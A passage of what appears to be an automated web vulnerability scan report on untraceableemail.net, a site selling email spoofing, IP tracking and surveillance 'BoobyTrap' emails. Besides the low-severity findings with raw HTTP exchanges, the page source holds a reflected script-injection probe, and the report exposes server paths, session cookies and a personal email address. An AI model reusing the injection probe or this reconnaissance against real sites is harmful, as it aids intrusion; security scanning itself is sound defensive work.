that will load the phone number map initializePhone(); } else { updatepage(self.xmlHttpReq.responseText); } //updatepage(self.xmlHttpReq.responseText); } } self.xmlHttpReq.send(getquerystring(this_id));}function getquerystring(id) { //var form = document.forms['f1']; //var word = form.word.value; //qstr = 'w=' + escape(word); // NOTE: no '?' before querystring qstr = 'id=' + id; return qstr;}function updatepage(str){ document.getElementById("update_pane").innerHTML = str;}</script> <script>function initialize() { //create map canvas var map = new GMap2(document.getElementById("map_canvas")); //set map type map.setMapType(G_SATELLITE_MAP); //set lat and long for map map.setCenter(new GLatLng(0, 0), 17); //set user interface to default which includes the zoom tool, and four map type buttons map.setUIToDefault(); //add point with set lat and long for point var point = new GLatLng(0,0); map.addOverlay(new GMarker(point)); }</script><script> var mapAdd = null; var geocoder = null; function initializeAddress() { mapAdd = new GMap2(document.getElementById("map_canvas_address")); mapAdd.setMapType(G_SATELLITE_MAP); mapAdd.setCenter(new GLatLng(37.4419, -122.1419), 15); mapAdd.setUIToDefault(); geocoder = new GClientGeocoder(); } function showAddress() { var address = "3 \'\"--></style></script><script>netsparker(0x000B9A)</script> 3 3 3 3"; if (geocoder) { geocoder.getLatLng( address, function(point) { if (!point) { alert(address + " not found"); } else { mapAdd.setCenter(point, 15); var marker = new GMarker(point); mapAdd.addOverlay(marker); //marker.openInfoWindowHtml(address); } } ); } }</script><script>function initializePhone() { //create map canvas var mapPhone = new GMap2(document.getElementById("map_canvas_phone")); //set map type mapPhone.setMapType(G_SATELLITE_MAP); //set lat and long for map mapPhone.setCenter(new GLatLng(, ), 17); //set user interface to default which includes the zoom tool, and four map type buttons mapPhone.setUIToDefault(); //add point with set lat and long for point var point = new GLatLng(,); mapPhone.addOverlay(new GMarker(point));}</script> <script type="text/javascript"> $(document).ready(function(){ Shadowbox.init({ handleOversize: "drag", displayNav: false, handleUnsupported: "remove", autoplayMovies: false, language: 'en', players: ['img', 'html', 'iframe', 'qt', 'wmp', 'swf', 'flv'] }); $('a.basic').cluetip({ width: '300px', height: '300px', showTitle: true }); //The table for the scans $("#myTable").tablesorter({ sortList:[[0,0]], widthFixed: true, headers: { 7: { sorter: false }, 8: { sorter: false } } }); /*$(".menu2 a").append("<em></em>"); $(".menu2 a").hover(function() { $(this).find("em").animate({opacity: "show", top: "-75"}, "slow"); var hoverText = $(this).attr("title"); $(this).find("em").text(hoverText); }, function() { $(this).find("em").animate({opacity: "hide", top: "-85"}, "fast"); });*/ }); </script> </head><body> <div class="wrapper"> <div class="nav-wrapper"> <div class="nav"> <ul id="navigation"> <li class=""> <a href="/ezpay/index.php"> <span class="menu-left"></span> <span class="menu-mid">My Account</span> <span class="menu-right"></span> </a> <div class="sub"> <ul> <li> <a href="/ezpay/subAccntForm.php">Sub Account</a> </li> </ul> <div class="btm-bg"></div> </div> </li> <li class=""> <a href="/tattletell/yourips.php"> <span class="menu-left"></span> <span class="menu-mid">Tattletell</span> <span class="menu-right"></span> </a> <div class="sub"> <ul> <li> <a href="/tattletell/yourips.php">Your IP Monitoring</a> </li> <li> <a href="/tattletell/addtarget.php">Add Target</a> </li> <li> <a href="/tattletell/signup.php">Purchase IPs</a> </li> </ul> <div class="btm-bg"></div> </div> </li> <li class=""> <a href="/email_snitch/index.php"> <span class="menu-left"></span> <span class="menu-mid">IPSnitch</span> <span class="menu-right"></span> </a> <div class="sub"> <ul> <li> <a href="/email_snitch/createSnitch.php">Add Target</a> </li> </ul> <div class="btm-bg"></div> </div> </li> <li class="active"> <a href="/portscanner/index.php"> <span class="menu-left"></span> <span class="menu-mid">PortSnitch</span> <span class="menu-right"></span> </a> </li> <li class=""> <a href="/proxy/spoofnetACCESS.php"> <span class="menu-left"></span> <span class="menu-mid">Spoofnet</span> <span class="menu-right"></span> </a> </li> <li class=""> <a href="/portsnitch/index.php"> <span class="menu-left"></span> <span class="menu-mid">Recon</span> <span class="menu-right"></span> </a> </li> <li class=""> <a href="/pc211/index.php"> <span class="menu-left"></span> <span class="menu-mid">PC211</span> <span class="menu-right"></span> </a> </li> <li class=""> <a href="/spoofem_suites/index.php"> <span class="menu-left"></span> <span class="menu-mid">SPOOFEM</span> <span class="menu-right"></span> </a> </li> <li class=""> <a href="/tools/index.php"> <span class="menu-left"></span> <span class="menu-mid">Tools</span> <span class="menu-right"></span> </a> </li> <li class=""> <a href="#"> <span class="menu-left"></span> <span class="menu-mid">Help</span> <span class="menu-right"></span> </a> </li> <li class="last"> <a href="/login/logout.php"> <span class="menu-left"></span> <span class="menu-mid">Logout</span> <span class="menu-right"></span> </a> </li> </ul> </div> </div><div class="content" style="width:800px;"><!-- begin top content --> <div style = "float: left"> <img src='portsnitchfinal.png' width="370px" /></div><div style = "float: left; margin-left: 2em; width:400px;"> <p align="justify"><font size="2"><b>PORTSNITCH</b> - For those that do not know what a "port" is, let me give you an example. Let’s say that your house is a computer, and your house has 65,000 windows and doors. Now imagine a potential burglar walking around your house checking to see if you have any open doors or windows. The burglar is not opening any of the doors or windows, but is checking to see if you left any of them open. We called him/her a "potential" burglar because until they illicitly enter an open door or window in which you left open, he/she has not broken any laws. That is the same as a hacker. Before a hacker can break-in to your computer, they perform what is called a "Port Scan" or “Vulnerability” check to see if you have any open ports (doors or windows). Once the hacker finds the open ports, he/she will then figure out which tools they will need to pry the door or window wide open, without setting off any alarms. These tools are called "Exploits."</font></p> <br /> <br /> </div><!-- end top content --> <div style="float:left;"..
Auto Complete Enabled

Auto Complete Enabled

1 TOTAL
LOW
CONFIRMED
1
"Auto Complete" was enabled in one or more of the form fields. These were either "password" fields or important fields such as "Credit Card".

Impact

Data entered in these fields will be cached by the browser. An attacker who can access the victim's browser could steal this information. This is especially important if the application is commonly used in shared computers such as cyber cafes or airport terminals.

Remedy

Add the attribute autocomplete="off" to the form tag or to individual "input" fields.

Actions to Take

  1. See the remedy for the solution.
  2. Find all instances of inputs which store private data and disable autocomplete. Fields which contain data such as "Credit Card" or "CCV" type data should not be cached. You can allow the application to cache usernames and remember passwords, however, in most cases this is not recommended.
  3. Re-scan the application after addressing the identified issues to ensure that all of the fixes have been applied properly.

Required Skills for Successful Exploitation

Dumping all data from a browser can be fairly easy and there exist a number of automated tools to undertake this. Where the attacker cannot dump the data, he/she could still browse the recently visited websites and activate the auto-complete feature to see previously entered values.

External References

- /boobitrap/eCheck.php

/boobitrap/eCheck.php CONFIRMED

http://www.untraceableemail.net/boobitrap/eCheck.php

Identified Field Name

password

Request

GET /boobitrap/eCheck.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.untraceableemail.net
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sat, 23 Apr 2011 04:38:32 GMT
Server: Apache/2.2.9 (Fedora)
Set-Cookie: Apache=173.193.214.243.1303533512871593; path=/; expires=Sat, 28-May-11 04:38:32 GMT
Content-Length: 1740
Connection: close
Content-Type: text/html; charset=UTF-8


<style type="text/css"><!--.boobytraptext { font-family: Arial, Helvetica, sans-serif; font-weight:bold;}.boobytraptext { color: #CCC; }body { background-color: #000; text-align: center;}--></style><table width="13%" height="643" border="0" align="center" cellpadding="10"> <tr valign="top"> <td height="119"><img src="images/boobytrap.png" alt="" width="400" height="117" /></td> </tr> <tr> <td height="282"><p class="boobytraptext"> <span class="boobytraptext"><strong>BoobyTrap Will allow you to send a &quot;BoobyTrap&quot; email to your email account. A BoobyTrap email is an email that wil let you know if anyone is reading your emails without your knowledge. It will give you the IP address of the person as well as give you a location of where they were when they read the email.</strong></span> </p> <p class="boobytraptext"><strong>In some cases boobytrap will allow you to take pictures and recordings of the culprit if they have a webcam attached or built-in their computer.</strong></p></td> </tr> <tr> <td height="216" align="center" class="boobytraptext"><p>Enter your username and password</p> <form id="form1" name="form1" method="post" action="validateUser.php"> <p>username: <label> <input type="text" name="uname" id="username"> </label> </p> <p><br> password: <label> <input type="password" name="password" id="password"> </label> </p> <p> <label> <input type="submit" name="start" id="start" value="Submit" /> </label> </p></form> <p>&nbsp;</p></td> </tr></table><p align="center">&nbsp;</p><p>&nbsp;</p>
Cookie Not Marked As HttpOnly

Cookie Not Marked As HttpOnly

1 TOTAL
LOW
CONFIRMED
1
Cookie was not marked as HTTPOnly. HTTPOnly cookies can not be read by client-side scripts therefore marking a cookie as HTTPOnly can provide an additional layer of protection against Cross-site Scripting attacks..

Impact

During a Cross-site Scripting attack an attacker might easily access cookies and hijack the victim's session.

Actions to Take

  1. See the remedy for solution
  2. Consider marking all of the cookies used by the application as HTTPOnly (After these changes javascript code will not able to read cookies.

Remedy

Mark the cookie as HTTPOnly. This will be an extra layer of defence against XSS. However this is not a silver bullet and will not protect the system against Cross-site Scripting attacks. An attacker can use a tool such as XSS Tunnel to bypass HTTPOnly protection.

External References

- /boobitrap/validateUser.php

/boobitrap/validateUser.php CONFIRMED

http://www.untraceableemail.net/boobitrap/validateUser.php

Identified Cookie

PHPSESSID

Request

POST /boobitrap/validateUser.php HTTP/1.1
Referer: http://www.untraceableemail.net/boobitrap/eCheck.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.untraceableemail.net
Cookie: Apache=173.193.214.243.1303533512871593
Content-Length: 29
Accept-Encoding: gzip, deflate

password=&start=Submit&uname=

Response

HTTP/1.1 302 Found
Date: Sat, 23 Apr 2011 04:38:33 GMT
Server: Apache/2.2.9 (Fedora)
Set-Cookie: PHPSESSID=c9fhah9rrs89idb44t95e2ubk1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: /boobitrap/payNow.php
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Apache Version Disclosure

Apache Version Disclosure

1 TOTAL
LOW
Netsparker identified that the target web server is an Apache server. This was disclosed through the HTTP response. This information can help an attacker to gain a greater understanding of the systems in use and potentially develop further attacks targeted at the specific version of Apache.

Impact

An attacker can search for specific security vulnerabilities for the version of Apache identified within the SERVER header.

Remedy

Configure your web server to prevent information leakage from the SERVER header of its HTTP response.
- /boobitrap/validateUser.php

/boobitrap/validateUser.php

http://www.untraceableemail.net/boobitrap/validateUser.php

Extracted Version

2.2.9 (Fedora)

Request

POST /boobitrap/validateUser.php HTTP/1.1
Referer: http://www.untraceableemail.net/boobitrap/eCheck.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.untraceableemail.net
Cookie: Apache=173.193.214.243.1303533512871593
Content-Length: 29
Accept-Encoding: gzip, deflate

password=&start=Submit&uname=

Response

HTTP/1.1 302 Found
Date: Sat, 23 Apr 2011 04:38:33 GMT
Server: Apache/2.2.9 (Fedora)
Set-Cookie: PHPSESSID=c9fhah9rrs89idb44t95e2ubk1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: /boobitrap/payNow.php
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Programming Error Message

Programming Error Message

1 TOTAL
LOW
Netsparker identified a programming error message.

Impact

The error message may disclose sensitive information and this information can be used by an attacker to mount new attacks or to enlarge the attack surface. Source code, stack trace, etc. type data may be disclosed. Most of these issues will be identified and reported separately by Netsparker.

Remedy

Do not provide error messages on production environments. Save error messages with a reference number to a backend storage such as a log, text file or database then show this number and a static user-friendly error message to the user.
- /proxy/includes/process.php

/proxy/includes/process.php

http://www.untraceableemail.net/proxy/includes/process.php?action=update

Identified Error Message

Request

GET /proxy/includes/process.php?action=update HTTP/1.1
Referer: http://www.untraceableemail.net/proxy/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.untraceableemail.net
Cookie: Apache=173.193.214.243.1303533512920701; PHPSESSID=da6gt429mc685hob4f5n0g4sm7
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sat, 23 Apr 2011 04:40:12 GMT
Server: Apache/2.2.9 (Fedora)
Content-Length: 482
Connection: close
Content-Type: text/html; charset=UTF-8


<br /><b>Warning</b>: require_once(config.php) [<a href='function.require-once'>function.require-once</a>]: failed to open stream: No such file or directory in <b>/var/www/html/proxy/includes/init.php</b> on line <b>6</b><br /><br /><b>Fatal error</b>: require_once() [<a href='function.require'>function.require</a>]: Failed opening required 'config.php' (include_path='.:/usr/share/pear:/usr/share/php') in <b>/var/www/html/proxy/includes/init.php</b> on line <b>6</b><br />
[Possible] Backup File Found

[Possible] Backup File Found

2 TOTAL
LOW
Netsparker identified a backup file on the web server.

Impact

Backup files can contain old or current versions of a file on the web server. This could include sensitive data such as password files or even the applications source code. This form of issue normally leads to further vulnerabilities or at worse sensitive information disclosure.

Remedy

Do not store backup files on production servers.
- /portscanner/index.php.bak

/portscanner/index.php.bak

http://www.untraceableemail.net/portscanner/index.php.bak

Request

GET /portscanner/index.php.bak HTTP/1.1
Referer: http://www.untraceableemail.net/portscanner/index.php.bak
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.untraceableemail.net
Cookie: Apache=173.193.214.243.1303533512920701; PHPSESSID=da6gt429mc685hob4f5n0g4sm7
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sat, 23 Apr 2011 04:39:20 GMT
Server: Apache/2.2.9 (Fedora)
Content-Length: 5736
Connection: close
Content-Type: text/html; charset=UTF-8


<html>
<head> <script type="text/javascript" src="library/country.js"></script>
<script type="text/javascript" src="library/ajax.js"></script>


<script language="Javascript">

function go_back_to_index() {
document.location='http://97.74.195.39/portscanner/index.php';
}

function validate(form) {
with (form) {
if (validate_email(email,"Not a valid e-mail address!")==false)
{email.select();return false;}
if(IsPhoneNumber(phone.value,"Please enter a valid phone number, with no '+,(-)' characters!")==false)
{phone.select(); return false;}
if(IsPhoneNumber(zip.value,"Please enter a valid zip code!")==false)
{zip.select(); return false;}
}
return true;
}
function validate_email(field,alerttxt) {
with (field)
{
apos=value.indexOf("@");
dotpos=value.lastIndexOf(".");
if (apos<1||dotpos-apos<2)
{alert(alerttxt);return false;}
else {return true;}
}
}

function IsPhoneNumber(strFieldValue, strAlert) {
size=strFieldValue.length;
for ( var i=0; i < size; i++) {

if(strFieldValue.charAt(i)!="" && strFieldValue.charAt(i)!="-" && strFieldValue.charAt(i)!="," &&
strFieldValue.charAt(i)!="(" && strFieldValue.charAt(i)!=")" &&
( strFieldValue.charAt(i) < "0" || strFieldValue.charAt(i) > "9" ) && strFieldValue.charAt(i) != "" )
{ alert(strAlert); return false; }
}
return true;
}



var interval_id;

function check_this_scan_status(this_id) {
var strURL ='check_this_scan_status.php';
var xmlHttpReq = false;
var self = this;
if (window.XMLHttpRequest) {
self.xmlHttpReq = new XMLHttpRequest();
}else if (window.ActiveXObject) {
self.xmlHttpReq = new ActiveXObject("Microsoft.XMLHTTP");
}
self.xmlHttpReq.open('POST', strURL, true);
self.xmlHttpReq.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
self.xmlHttpReq.onreadystatechange = function() {
if (self.xmlHttpReq.readyState == 4) {
updatepage(self.xmlHttpReq.responseText);
}
}

self.xmlHttpReq.send(getquerystring(this_id));

}



function getquerystring(id) {
qstr = 'id=' + id; // NOTE: no '?' before querystring
return qstr;
}

function updatepage(str){
document.getElementById("update_pane").innerHTML = str;
}
</script>
<style>
body {
font-family: Verdana, Helvetica, sans-serif;
font-size: 11pt;
color: #000000;
padding:4px;
width: 80%;
margin:1pt 0pt 8pt 40pt;
border:1px solid black;
text-align: left;
}
</style>


</head> <body><table><form name='form1' id='scan_request' action='index.php' onsubmit='return validate(this);' method='post'><tr><td><b>First Name: </b></td><td><input type=text name='fname' id='fname' value=''><td></td></tr><tr><td><b>Last Name: </b></td><td><input type=text name='lname' id='lname' value=''><td></td></tr><tr><td><b>Company: </b></td><td><input type=text name='company' id='company' value=''><td></td></tr><tr><td><b>Address: </b></td><td><input type=text name='address_1' id='address_1' value=''><td></td></tr><tr><td> &nbsp </td><td><input type=text name='address_2' id='address_2' value=''><td></td></tr><tr><td><b>City:</b></td><td><input type=text name='city' id='city' value=''><td></td></tr><tr><td><b>Country:</b></td><td><select name='cboCountry' id='cboCountry' onChange='Fill_States();'>
<option selected='selected'>12345678901234567890</option>
<option>temp</option>
</select><td></td></tr><tr><td><b>State/Province:</b></td><td><select name='cboState' id='cboState' onChange='Update_Globals();'>
<option selected='selected'>12345678901234567890</option>
<option>temp</option>
</select><td></td></tr><tr><td><b>Zip:</b></td><td><input type=text name='zip' id='zip' value=''><td></td></tr><tr><td><b>Phone: </b></td><td><input type=text name='phone' id='phone' value=''><td></td></tr><tr><td><b>IP To Scan: </b></td><td><input type=text onBlur='checkServer();' name='host' id='host' value=''> <b>Your IP: </b>173.193.214.243<td></td></tr>
<tr>
<td><b>Email: </b></td>
<td><input type=text name='email' id='email' value=''>
<td></td>
</tr>
<tr><td><input type='submit' name='submit' id='submit' value='Scan'></td><td><div id=status></div><td></td></tr></form></table>
<script type="text/javascript">
Fill_Country();
Fill_States();
if(document.form1)
document.form1.cboCountry.selectedIndex=239;
Fill_States();
</script>

</body> </html>
- /portscanner/biz/index.php.bak

/portscanner/biz/index.php.bak

http://www.untraceableemail.net/portscanner/biz/index.php.bak

Request

GET /portscanner/biz/index.php.bak HTTP/1.1
Referer: http://www.untraceableemail.net/portscanner/biz/index.php.bak
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.untraceableemail.net
Cookie: Apache=173.193.214.243.1303533512920701; PHPSESSID=da6gt429mc685hob4f5n0g4sm7
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sat, 23 Apr 2011 04:40:55 GMT
Server: Apache/2.2.9 (Fedora)
Content-Length: 5736
Connection: close
Content-Type: text/html; charset=UTF-8


<html>
<head> <script type="text/javascript" src="library/country.js"></script>
<script type="text/javascript" src="library/ajax.js"></script>


<script language="Javascript">

function go_back_to_index() {
document.location='http://97.74.195.39/portscanner/index.php';
}

function validate(form) {
with (form) {
if (validate_email(email,"Not a valid e-mail address!")==false)
{email.select();return false;}
if(IsPhoneNumber(phone.value,"Please enter a valid phone number, with no '+,(-)' characters!")==false)
{phone.select(); return false;}
if(IsPhoneNumber(zip.value,"Please enter a valid zip code!")==false)
{zip.select(); return false;}
}
return true;
}
function validate_email(field,alerttxt) {
with (field)
{
apos=value.indexOf("@");
dotpos=value.lastIndexOf(".");
if (apos<1||dotpos-apos<2)
{alert(alerttxt);return false;}
else {return true;}
}
}

function IsPhoneNumber(strFieldValue, strAlert) {
size=strFieldValue.length;
for ( var i=0; i < size; i++) {

if(strFieldValue.charAt(i)!="" && strFieldValue.charAt(i)!="-" && strFieldValue.charAt(i)!="," &&
strFieldValue.charAt(i)!="(" && strFieldValue.charAt(i)!=")" &&
( strFieldValue.charAt(i) < "0" || strFieldValue.charAt(i) > "9" ) && strFieldValue.charAt(i) != "" )
{ alert(strAlert); return false; }
}
return true;
}



var interval_id;

function check_this_scan_status(this_id) {
var strURL ='check_this_scan_status.php';
var xmlHttpReq = false;
var self = this;
if (window.XMLHttpRequest) {
self.xmlHttpReq = new XMLHttpRequest();
}else if (window.ActiveXObject) {
self.xmlHttpReq = new ActiveXObject("Microsoft.XMLHTTP");
}
self.xmlHttpReq.open('POST', strURL, true);
self.xmlHttpReq.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
self.xmlHttpReq.onreadystatechange = function() {
if (self.xmlHttpReq.readyState == 4) {
updatepage(self.xmlHttpReq.responseText);
}
}

self.xmlHttpReq.send(getquerystring(this_id));

}



function getquerystring(id) {
qstr = 'id=' + id; // NOTE: no '?' before querystring
return qstr;
}

function updatepage(str){
document.getElementById("update_pane").innerHTML = str;
}
</script>
<style>
body {
font-family: Verdana, Helvetica, sans-serif;
font-size: 11pt;
color: #000000;
padding:4px;
width: 80%;
margin:1pt 0pt 8pt 40pt;
border:1px solid black;
text-align: left;
}
</style>


</head> <body><table><form name='form1' id='scan_request' action='index.php' onsubmit='return validate(this);' method='post'><tr><td><b>First Name: </b></td><td><input type=text name='fname' id='fname' value=''><td></td></tr><tr><td><b>Last Name: </b></td><td><input type=text name='lname' id='lname' value=''><td></td></tr><tr><td><b>Company: </b></td><td><input type=text name='company' id='company' value=''><td></td></tr><tr><td><b>Address: </b></td><td><input type=text name='address_1' id='address_1' value=''><td></td></tr><tr><td> &nbsp </td><td><input type=text name='address_2' id='address_2' value=''><td></td></tr><tr><td><b>City:</b></td><td><input type=text name='city' id='city' value=''><td></td></tr><tr><td><b>Country:</b></td><td><select name='cboCountry' id='cboCountry' onChange='Fill_States();'>
<option selected='selected'>12345678901234567890</option>
<option>temp</option>
</select><td></td></tr><tr><td><b>State/Province:</b></td><td><select name='cboState' id='cboState' onChange='Update_Globals();'>
<option selected='selected'>12345678901234567890</option>
<option>temp</option>
</select><td></td></tr><tr><td><b>Zip:</b></td><td><input type=text name='zip' id='zip' value=''><td></td></tr><tr><td><b>Phone: </b></td><td><input type=text name='phone' id='phone' value=''><td></td></tr><tr><td><b>IP To Scan: </b></td><td><input type=text onBlur='checkServer();' name='host' id='host' value=''> <b>Your IP: </b>173.193.214.243<td></td></tr>
<tr>
<td><b>Email: </b></td>
<td><input type=text name='email' id='email' value=''>
<td></td>
</tr>
<tr><td><input type='submit' name='submit' id='submit' value='Scan'></td><td><div id=status></div><td></td></tr></form></table>
<script type="text/javascript">
Fill_Country();
Fill_States();
if(document.form1)
document.form1.cboCountry.selectedIndex=239;
Fill_States();
</script>

</body> </html>
Forbidden Resource

Forbidden Resource

1 TOTAL
INFORMATION
CONFIRMED
1
Access to this resource has been denied by the web server. This is generally not a security issue, and is reported here for information purposes.

Impact

There is no impact resulting from this issue.
- /icons/

/icons/ CONFIRMED

http://www.untraceableemail.net/icons/

Request

GET /icons/ HTTP/1.1
Referer: http://www.untraceableemail.net/icons/blank.gif
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.untraceableemail.net
Cookie: Apache=173.193.214.243.1303533512920701; PHPSESSID=da6gt429mc685hob4f5n0g4sm7
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 403 Forbidden
Date: Sat, 23 Apr 2011 04:38:33 GMT
Server: Apache/2.2.9 (Fedora)
Content-Length: 297
Connection: close
Content-Type: text/html; charset=iso-8859-1


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access /icons/on this server.</p><hr><address>Apache/2.2.9 (Fedora) Server at www.untraceableemail.net Port 80</address></body></html>
Directory Listing (Apache)

Directory Listing (Apache)

1 TOTAL
INFORMATION
The web server responded with a list of files located in the target directory.

Impact

An attacker can see the files located in the directory and could potentially access files which disclose sensitive information.

Actions to Take

  1. See the remedy for solution.
  2. Configure the web server to disallow directory listing requests.
  3. This can also be caused the web server products that don't have latest security patches. Ensure that all of the patches have been applied.

Remedy

Change your httpd.conf file. A secure configuration for the requested directory should be similar to the following one:
<Directory /{YOUR DIRECTORY}>
	Options FollowSymLinks 
</Directory>
Remove the Indexes option from configuration. Do not forget to remove MultiViews as well.

External References

- /boobitrap/shadowbox/

/boobitrap/shadowbox/

http://www.untraceableemail.net/boobitrap/shadowbox/?C=N;O=D

Request

GET /boobitrap/shadowbox/?C=N;O=D HTTP/1.1
Referer: http://www.untraceableemail.net/boobitrap/shadowbox/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.untraceableemail.net
Cookie: Apache=173.193.214.243.1303533512920701; PHPSESSID=da6gt429mc685hob4f5n0g4sm7
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sat, 23 Apr 2011 04:38:33 GMT
Server: Apache/2.2.9 (Fedora)
Content-Length: 2584
Connection: close
Content-Type: text/html;charset=ISO-8859-1


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"><html> <head> <title>Index of /boobitrap/shadowbox</title> </head> <body><h1>Index of /boobitrap/shadowbox</h1><table><tr><th><img src="/icons/blank.gif" alt="[ICO]"></th><th><a href="?C=N;O=A">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a></th></tr><tr><th colspan="5"><hr></th></tr><tr><td valign="top"><img src="/icons/back.gif" alt="[DIR]"></td><td><a href="/boobitrap/">Parent Directory</a></td><td>&nbsp;</td><td align="right"> - </td></tr><tr><td valign="top"><img src="/icons/text.gif" alt="[TXT]"></td><td><a href="stock.php">stock.php</a></td><td align="right">12-Nov-2009 12:23 </td><td align="right">598 </td></tr><tr><td valign="top"><img src="/icons/unknown.gif" alt="[ ]"></td><td><a href="shadowbox.js">shadowbox.js</a></td><td align="right">03-Nov-2009 23:34 </td><td align="right"> 22K</td></tr><tr><td valign="top"><img src="/icons/text.gif" alt="[TXT]"></td><td><a href="shadowbox.css">shadowbox.css</a></td><td align="right">21-Dec-2009 18:18 </td><td align="right">2.2K</td></tr><tr><td valign="top"><img src="/icons/folder.gif" alt="[DIR]"></td><td><a href="resources/">resources/</a></td><td align="right">15-Dec-2009 12:29 </td><td align="right"> - </td></tr><tr><td valign="top"><img src="/icons/folder.gif" alt="[DIR]"></td><td><a href="players/">players/</a></td><td align="right">14-Dec-2009 10:51 </td><td align="right"> - </td></tr><tr><td valign="top"><img src="/icons/folder.gif" alt="[DIR]"></td><td><a href="libraries/">libraries/</a></td><td align="right">14-Dec-2009 10:50 </td><td align="right"> - </td></tr><tr><td valign="top"><img src="/icons/folder.gif" alt="[DIR]"></td><td><a href="languages/">languages/</a></td><td align="right">14-Dec-2009 10:48 </td><td align="right"> - </td></tr><tr><td valign="top"><img src="/icons/folder.gif" alt="[DIR]"></td><td><a href="adapters/">adapters/</a></td><td align="right">14-Dec-2009 10:47 </td><td align="right"> - </td></tr><tr><td valign="top"><img src="/icons/text.gif" alt="[TXT]"></td><td><a href="LICENSE">LICENSE</a></td><td align="right">03-Nov-2009 23:34 </td><td align="right">2.2K</td></tr><tr><td valign="top"><img src="/icons/text.gif" alt="[TXT]"></td><td><a href="CHANGES">CHANGES</a></td><td align="right">03-Nov-2009 23:33 </td><td align="right">1.2K</td></tr><tr><th colspan="5"><hr></th></tr></table><address>Apache/2.2.9 (Fedora) Server at www.untraceableemail.net Port 80</address></body></html>
E-mail Address Disclosure

E-mail Address Disclosure

1 TOTAL
INFORMATION
Netsparker found e-mail addresses on the web site.

Impact

E-mail addresses discovered within the application can be used by both spam email engines and also brute force tools. Furthermore valid email addresses may lead to social engineering attacks .

Remedy

Use generic email addresses such as contact@ or info@ for general communications, remove user/people specific e-mail addresses from the web site, should this be required use submission forms for this purpose.

External References

- /boobitrap/images/

/boobitrap/images/

http://www.untraceableemail.net/boobitrap/images/

Found E-mails

eigyan@iegraphics.com

Request

GET /boobitrap/images/ HTTP/1.1
Referer: http://www.untraceableemail.net/boobitrap/images/boobytrap.png
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.untraceableemail.net
Cookie: Apache=173.193.214.243.1303533512871593
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sat, 23 Apr 2011 04:38:33 GMT
Server: Apache/2.2.9 (Fedora)
Content-Length: 1043
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><title>Untitled Document</title><style type="text/css"><!--.header { font-family: Verdana, Geneva, sans-serif;}--></style></head>_111222<body><p><img src="/images/boobytrap.png" width="400" height="117" alt="" /></p><p>&nbsp;</p><p class="header">BoobyTrap will help you verify if your email is being monitored.</p><p class="header">You will receive an email from First National Bank of Manhattan.</p><p><span class="header">DO NOT OPEN THIS EMAIL</span>.</p><p>&nbsp;</p><form id="form1" name="form1" method="post" action="boobtest.php"> <label> <input type="submit" name="btn" id="btn" value="START&nbsp;THE&nbsp;PROCESS>>>" /> </label> <input type="hidden" name="email_contact" id="email_contact" value="eigyan@iegraphics.com" /></form><p>&nbsp;</p></body></html>
Redirect Response BODY Is Too Large

Redirect Response BODY Is Too Large

1 TOTAL
INFORMATION
CONFIRMED
1
Netsparker identified that the response from the page returned an HTTP Redirect Status but output more information than usual. This generally indicates that after redirect, page did not finish the response as it was supposed to.

Impact

This can lead serious issues such authentication bypass in authentication required pages, in other pages it generally indicates a programming error.

Remedy

Finish the HTTP Response after you redirect the user.

In ASP.NET use Response.Redirect("redirected-page.aspx", true); instead of Response.Redirect("redirected-page.aspx", false); In PHP applications call exit(); after you redirect the user.
- /proxy/index.php

/proxy/index.php CONFIRMED

http://www.untraceableemail.net/proxy/index.php

Request

GET /proxy/index.php HTTP/1.1
Referer: http://www.untraceableemail.net/ezpay/
